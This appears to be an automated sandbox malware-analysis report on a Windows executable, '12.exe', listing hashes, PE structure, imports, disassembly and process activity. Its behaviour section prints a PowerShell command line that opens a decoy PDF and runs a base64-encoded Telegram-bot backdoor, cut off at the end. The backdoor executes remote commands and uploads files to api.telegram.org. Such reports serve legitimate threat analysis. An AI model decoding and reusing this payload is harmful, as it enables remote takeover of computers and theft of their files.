                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):55
                                                                                  Entropy (8bit):4.306461250274409
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                  Malicious:false
                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                  Entropy (8bit):6.1963492880257665
                                                                                  TrID:
                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:12.exe
                                                                                  File size:232'448 bytes
                                                                                  MD5:90f2ca0a38d6e5416ee2f6be6326521d
                                                                                  SHA1:00bf14e8153778835f95b9255ae1658e37819f8d
                                                                                  SHA256:6534d5fd803f9c85bec3a820cef54f953e8643f3a4e16677d11decbf1a5b54c7
                                                                                  SHA512:aa07eb51552921407b0407456f4a0235198e8bdb33981097bf034018b0e181eab6cc37bd695f9342e9e1a8c61a2094bfc2241592b8598c1a864468798f74912d
                                                                                  SSDEEP:6144:5C+bHVcNxsYQ9I8ZIH9x7Uj6JBTLCZVFigz:E0HVuxsYn8GH9x7Uj6JBTLCZ
                                                                                  TLSH:65346B69B7A40CF8E67B9279CC561A05D6B6BC074760EBCF03D006569F232D09E3EB61
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X"..9LU.9LU.9LU.AOT.9LU.AITb9LU.AHT.9LU..OT.9LU..HT.9LU..IT.9LU.AMT.9LU.9MU.9LU..ET.9LU...U.9LU..NT.9LURich.9LU...............

                                                                                  File Icon

                                                                                  Icon Hash:90cececece8e8eb0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x140008398
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x140000000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6769010D [Mon Dec 23 06:19:57 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:bae9372ed29a79b82eb7891c89186cec

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  dec eax
                                                                                  sub esp, 28h
                                                                                  call 00007F86D4E41710h
                                                                                  dec eax
                                                                                  add esp, 28h
                                                                                  jmp 00007F86D4E40C2Fh
                                                                                  int3
                                                                                  int3
                                                                                  dec eax
                                                                                  sub esp, 28h
                                                                                  dec ebp
                                                                                  mov eax, dword ptr [ecx+38h]
                                                                                  dec eax
                                                                                  mov ecx, edx
                                                                                  dec ecx
                                                                                  mov edx, ecx
                                                                                  call 00007F86D4E40DC2h
                                                                                  mov eax, 00000001h
                                                                                  dec eax
                                                                                  add esp, 28h
                                                                                  ret
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  inc eax
                                                                                  push ebx
                                                                                  inc ebp
                                                                                  mov ebx, dword ptr [eax]
                                                                                  dec eax
                                                                                  mov ebx, edx
                                                                                  inc ecx
                                                                                  and ebx, FFFFFFF8h
                                                                                  dec esp
                                                                                  mov ecx, ecx
                                                                                  inc ecx
                                                                                  test byte ptr [eax], 00000004h
                                                                                  dec esp
                                                                                  mov edx, ecx
                                                                                  je 00007F86D4E40DC5h
                                                                                  inc ecx
                                                                                  mov eax, dword ptr [eax+08h]
                                                                                  dec ebp
                                                                                  arpl word ptr [eax+04h], dx
                                                                                  neg eax
                                                                                  dec esp
                                                                                  add edx, ecx
                                                                                  dec eax
                                                                                  arpl ax, cx
                                                                                  dec esp
                                                                                  and edx, ecx
                                                                                  dec ecx
                                                                                  arpl bx, ax
                                                                                  dec edx
                                                                                  mov edx, dword ptr [eax+edx]
                                                                                  dec eax
                                                                                  mov eax, dword ptr [ebx+10h]
                                                                                  mov ecx, dword ptr [eax+08h]
                                                                                  dec eax
                                                                                  mov eax, dword ptr [ebx+08h]
                                                                                  test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                  je 00007F86D4E40DBDh
                                                                                  movzx eax, byte ptr [ecx+eax+03h]
                                                                                  and eax, FFFFFFF0h
                                                                                  dec esp
                                                                                  add ecx, eax
                                                                                  dec esp
                                                                                  xor ecx, edx
                                                                                  dec ecx
                                                                                  mov ecx, ecx
                                                                                  pop ebx
                                                                                  jmp 00007F86D4E407FEh
                                                                                  int3
                                                                                  dec eax
                                                                                  mov eax, esp
                                                                                  dec eax
                                                                                  mov dword ptr [eax+08h], ebx
                                                                                  dec eax
                                                                                  mov dword ptr [eax+10h], ebp
                                                                                  dec eax
                                                                                  mov dword ptr [eax+18h], esi
                                                                                  dec eax
                                                                                  mov dword ptr [eax+20h], edi
                                                                                  inc ecx
                                                                                  push esi
                                                                                  dec eax
                                                                                  sub esp, 20h
                                                                                  dec ecx
                                                                                  mov ebx, dword ptr [ecx+38h]
                                                                                  dec eax
                                                                                  mov esi, edx
                                                                                  dec ebp
                                                                                  mov esi, eax
                                                                                  dec eax
                                                                                  mov ebp, ecx
                                                                                  dec ecx
                                                                                  mov edx, ecx
                                                                                  dec eax
                                                                                  mov ecx, esi
                                                                                  dec ecx
                                                                                  mov edi, ecx
                                                                                  dec esp
                                                                                  lea eax, dword ptr [ebx+04h]
                                                                                  call 00007F86D4E40D21h

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x34d500x28.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x1e0.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x390000x222c.pdata
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x3d0000x960.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x30c600x70.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x30b200x140.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x240000x2e8.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x22a300x22c00cdb7432b3f088c769eb16769c4424884False0.5556640625data6.4462504419943IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x240000x117000x11800e0d54e3796ebc0fb78d4078789258b4bFalse0.3832310267857143data4.976685659786107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x360000x2a440x14009c8cd079a9c68b3eb4060a0a7282fe58False0.168359375DOS executable (block device driver)2.7946886101663733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .pdata0x390000x222c0x2400e000eee54fad835513101cb67b3c1fa0False0.4638671875data5.167999163396566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x3c0000x1e00x20063a978a93afb85b47b650b22380a3ca0False0.53125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x3d0000x9600xa0041784215a8e29e2be4bfc51218173d3fFalse0.498828125data5.324888411724977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_MANIFEST0x3c0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                  Imports

                                                                                  DLLImport
                                                                                  KERNEL32.dllInitializeCriticalSectionEx, WaitForSingleObject, GetLastError, CloseHandle, DecodePointer, DeleteCriticalSection, CreateProcessW, SetEndOfFile, WriteConsoleW, SetStdHandle, LocalFree, FormatMessageA, GetLocaleInfoEx, CreateFileW, FindClose, FindFirstFileExW, FindNextFileW, GetFileAttributesW, GetTempPathW, AreFileApisANSI, GetModuleHandleW, GetProcAddress, MultiByteToWideChar, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, EncodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, RaiseException, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, WriteFile, GetFileSizeEx, SetFilePointerEx, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, RtlUnwind

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  No network behavior found

                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:03:54:59
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Users\user\Desktop\12.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\Desktop\12.exe"
                                                                                  Imagebase:0x7ff767ef0000
                                                                                  File size:232'448 bytes
                                                                                  MD5 hash:90F2CA0A38D6E5416EE2F6BE6326521D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:03:54:59
                                                                                  Start date:14/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAVQBSAEkAIAA+ACAAJABuAHUAbABsAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABJAG4AdgBvAGsAZQAtAEIAbwB0AEQAbwB3AG4AbABvAGEAZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQARgBpAGwAZQBQAGEAdABoAA0ACgAgACAAIAAgACkADQAKACAAIAAgACAAQQBkAGQALQB0AHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAA0ACgAgACAAIAAgACQARgBpAGUAbABkAE4AYQBtAGUAIAA9ACAAJwBkAG8AYwB1AG0AZQBuAHQAJwANAAoAIAAgACAAIAAkAGgAdAB0AHAAQwBsAGkAZQBuAHQASABhAG4AZABsAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAALgBIAHQAdABwAEMAbABpAGUAbgB0AEgAYQBuAGQAbABlAHIADQAKACAAIAAgACAAJABoAHQAdABwAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcAAuAEgAdAB0AHAAYwBsAGkAZQBuAHQAIAAkAGgAdAB0AHAAQwBsAGkAZQBuAHQASABhAG4AZABsAGUAcgANAAoADQAKACAAIAAgACAAJABGAGkAbABlAFMAdAByAGUAYQBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAFMAdAByAGUAYQBtAF0AOgA6AG4AZQB3ACgAJABGAGkAbABlAFAAYQB0AGgALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE0AbwBkAGUAXQA6ADoATwBwAGUAbgApAA0ACgAgACAAIAAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAC4ASABlAGEAZABlAHIAcwAuAEMAbwBuAHQAZQBuAHQARABpAHMAcABvAHMAaQB0AGkAbwBuAEgAZQBhAGQAZQByAFYAYQBsAHUAZQBdADoAOgBuAGUAdwAoACcAZgBvAHIAbQAtAGQAYQB0AGEAJwApAA0ACgAgACAAIAAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgAuAE4AYQBtAGUAIAA9ACAAJABGAGkAZQBsAGQATgBhAG0AZQANAAoAIAAgACAAIAAkAEYAaQBsAGUASABlAGEAZABlAHIALgBGAGkAbABlAE4AYQBtAGUAIAA9ACAAKABTAHAAbABpAHQALQBQAGEAdABoACAAJABGAGkAbABlAFAAYQB0AGgAIAAtAGwAZQBhAGYAKQANAAoAIAAgACAAIAAkAEYAaQBsAGUAQwBvAG4AdABlAG4AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAC4AUwB0AHIAZQBhAG0AQwBvAG4AdABlAG4AdABdADoAOgBuAGUAdwAoACQARgBpAGwAZQBTAHQAcgBlAGEAbQApAA0ACgAgACAAIAAgACQARgBpAGwAZQBDAG8AbgB0AGUAbgB0AC4ASABlAGEAZABlAHIAcwAuAEMAbwBuAHQAZQBuAHQARABpAHMAcABvAHMAaQB0AGkAbwBuACAAPQAgACQARgBpAGwAZQBIAGUAYQBkAGUAcgANAAoAIAAgACAAIAAkAEYAaQBsAGUAQwBvAG4AdABlAG4AdAAuAEgAZQBhAGQAZQByAHMALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFcAZQBiAC4ATQBpAG0AZQBNAGEAcABwAGkAbgBnAF0AOgA6AEcAZQB0AE0AaQBtAGUATQBhAHAAcABpAG4AZwAoACQARgBpAGwAZQBQAGEAdABoACkAIAANAAoAIAAgACAAIAANAAoAIAAgACAAIAAkAE0AdQBsAHQAaQBwAGEAcgB0AEMAbwBuAHQAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcAAuAE0AdQBsAHQAaQBwAGEAcgB0AEYAbwByAG0ARABhAHQAYQBDAG8AbgB0AGUAbgB0AF0AOgA6AG4AZQB3ACgAKQANAAoAIAAgACAAIAAkAE0AdQBsAHQAaQBwAGEAcgB0AEMAbwBuAHQAZQBuAHQALgBBAGQAZAAoACQARgBpAGwAZQBDAG8AbgB0AGUAbgB0ACkADQAKACAAIAAgACAADQAKACAAIAAgACAAJABoAHQAdABwAEMAbABpAGUAbgB0AC4AUABvAHMAdABBAHMAeQBuAGMAKAAiACQAVQBSAEwALwBzAGUAbgBkAEQAbwBjAHUAbQBlAG4AdAA/AGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AIgAsACAAJABNAHUAbAB0AGkAcABhAHIAdABDAG8AbgB0AGUAbgB0ACkAIAA+ACAAJABuAHUAbABsAA0ACgB9AA0ACgANAAoAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgACQAaQBuAE0AZQBzAHMAYQBnAGUAIAA9ACAASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBNAGUAdABoAG8AZAAgAEcAZQB0ACAALQBVAHIAaQAgACgAJABVAFIATAAgACsAJwAvAGcAZQB0AFUAcABkAGEAdABlAHMAPwBvAGYAZgBzAGUAdAA9ACcAIAArACAAKAAkAGwAYQBzAHQASQBEACAAKwAgADEAKQApACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAYwBhAHQAYwBoACAAewANAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgACQAKABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGEAeABpAG0AdQBtACAAMQAwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAGMAbwBuAHQAaQBuAHUAZQANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACQAaQBuAE0AZQBzAHMAYQBnAGUALgByAGUAcwB1AGwAdAAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAB1AHAAZABhAHQAZQBpAGQAIAA9ACAAJABfAC4AdQBwAGQAYQB0AGUAXwBpAGQADQAKACAAIAAgACAAIAAgACAAIAAkAGYAcgBvAG0AIAA9ACAAJABfAC4AbQBlAHMAcwBhAGcAZQAuAGYAcgBvAG0ALgBpAGQADQAKACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAXwAuAG0AZQBzAHMAYQBnAGUALgB0AGUAeAB0ACkAKQANAAoADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADYAKQAgAC0AZQBxACAAIgAvAHMAbABlAGUAcAAiACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIABbAGkAbgB0AF0AJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA3ACkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADQAKQAgAC0AZQBxACAAIgAvAGMAbQBkACIAKQB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA1ACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AQgBvAHQAQwBtAGQAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAGMAbwBtAG0AYQBuAGQADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgADkAKQAgAC0AZQBxACAAIgAvAGQAbwB3AG4AbABvAGEAZAAiACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABGAGkAbABlAFAAYQB0AGgAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAxADAAKQAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAEIAbwB0AEQAbwB3AG4AbABvAGEAZAAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABGAGkAbABlAFAAYQB0AGgAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABjAG0AZAAgAD0AIAAkAGMAbwBtAG0AYQBuAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoADEALAAgADUAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABpAGQAZQBuAHQAaQBmAGkAZQByACAALQBlAHEAIAAkAGMAbQBkACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAIAA9ACAAJABjAG8AbQBtAGEAbgBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAA3ACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAC0AYwBvAG0AbQBhAG4AZAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAUwBMAEUARQBQACIADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAJAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAAxADAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAfQANAAoAIAAgACAAIAB